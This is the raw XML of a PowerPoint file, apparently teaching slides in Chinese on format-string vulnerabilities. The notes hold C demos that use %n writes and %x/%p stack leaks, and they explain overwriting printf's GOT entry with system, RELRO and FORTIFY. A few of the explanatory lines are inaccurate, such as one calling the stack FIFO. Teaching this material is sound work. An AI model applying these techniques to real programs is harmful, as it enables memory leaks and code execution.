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heme/theme2.xml" ContentType="application/vnd.openxmlformats-officedocument.them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5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/comments/comment2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.comment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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/comments/comment4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.comment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9.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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/comments/comment5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.comment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09" r:id="rId2"/>
    <p:sldId id="416" r:id="rId3"/>
    <p:sldId id="424" r:id="rId4"/>
    <p:sldId id="418" r:id="rId5"/>
    <p:sldId id="419" r:id="rId6"/>
    <p:sldId id="475" r:id="rId7"/>
    <p:sldId id="474" r:id="rId8"/>
    <p:sldId id="480" r:id="rId9"/>
    <p:sldId id="481" r:id="rId10"/>
    <p:sldId id="460" r:id="rId11"/>
    <p:sldId id="470" r:id="rId12"/>
    <p:sldId id="44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1618" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="59" d="100"/>
          <a:sy n="59" d="100"/>
        </p:scale>
        <p:origin x="123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11T18:08:32.83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sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int a=0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>printf("hhh%n a\n",&amp;a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>printf("%d\n",a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#********************************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>int main(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>= 0xdeadbeef;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf("%7$p");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>##############################################################</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对于每一个 </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printf</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都会从栈上取一个数字，把该数字视为地址，然后打印出该地址指向的内存内容，由于不可能获取的每一个数字都是地址，所以数字对应的内容可能不存在，或者这个地址是被保护的，那么便会使程序崩溃</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堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>栈都是一种数据项按序排列的数据结构，只能在一端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>称为栈顶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(top))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>对数据项进行插入和删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>堆：顺序随意      栈：后进先出(Last-In/First-Out)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>堆是指程序运行时申请的动态内存，而栈只是指一种使用堆的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即先进后出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>栈(Stack)是操作系统在建立某个进程时或者线程（在支持多线程的操作系统中是线程）为这个线程建立的存储区域，该区域具有FIFO的特性，在编译的时候可以指定需要的Stack的大小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>堆栈本身就是栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  char a[100]="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>AAAA.%X.%x.%X.%X.%X.%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  system("pause");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}</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en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当我们修改某个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> GOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表项的时候，比如把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 的 GOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表项修改成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的地址，那执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的时候实际上是执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#*************************************************************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.yuque.com/hxfqg9/bin/aedgn4#9qSNM</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>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重定位表即我们经常提到的ELF文件中的got表和plt表。这两个表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序外部的函数和变量的重定位做准备的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不在程序里定义和实现的函数和变量，比如read。显然你在自己的代码里调用read函数的时候不用自己写一个read函数的实现</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于重定位需要额外的性能开销，出于优化考虑，程序会使用延迟加载，即外部函数的内存地址是在第一次被调用时被找到并且填进got表里面的。</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如read函数，第一次调用即为程序第一次执行call read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Partial RELRO：重定位表格只读，重定位项可读写；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开启了FORTIFY保护的程序会被checksec检出，此外，在反汇编时直接查看got表也会发现chk函数的存在</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file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/pic_sup.png"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pn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5.xml"/><Relationship Id="rId7"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7.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag76.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/0_pic_quater_right_down.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sup.png" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag81.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.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1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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6.xml"/><Relationship Id="rId7"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8.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag87.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/0_pic_quater_right_down.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4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.pn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02.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><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3.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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag110.xml"/><Relationship Id="rId10"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3.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png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag119.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.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2.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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125.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image" Target="../media/image3.png"/><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file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/0_pic_quater_right_down.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3.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39.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.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file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/pic_half_right.png" TargetMode="Externa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file:///C:\Users\1V994W2\PycharmProjects\PPT_Background_Generation/pic_temp/pic_half_left.png" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><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5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.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53.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag52.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file:///C:\Users\1V994W2\Documents\Tencent%20Files\574576071\FileRecv\&#25340;&#35013;&#32032;&#26448;\forright\\18\subject_holdleft_36,36,36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3.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62.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.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png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70.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69.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11" r:link="rId12"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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188529" y="2478525"/>
            <a:ext cx="5657850" cy="1047218"/>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4" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188075" y="3799571"/>
            <a:ext cx="5280025" cy="473075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000" spc="200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑副标题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接连接符 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280150" y="3627486"/>
            <a:ext cx="5092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5" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188074" y="4485371"/>
            <a:ext cx="2162711" cy="473075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>汇报人姓名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9290149" y="4485371"/>
            <a:ext cx="2162711" cy="473075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>汇报人姓名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email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="720090" cy="588767"/>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7" r:link="rId8"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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440696" y="2695734"/>
            <a:ext cx="4995930" cy="1466532"/>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80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0" y="0"/>
            <a:ext cx="720090" cy="588767"/>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email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11471910" y="0"/>
            <a:ext cx="720090" cy="5887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588767"/>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588767"/>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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" r:link="rId14" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11471910" y="6269233"/>
            <a:ext cx="720090" cy="588767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" r:link="rId16" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6269233"/>
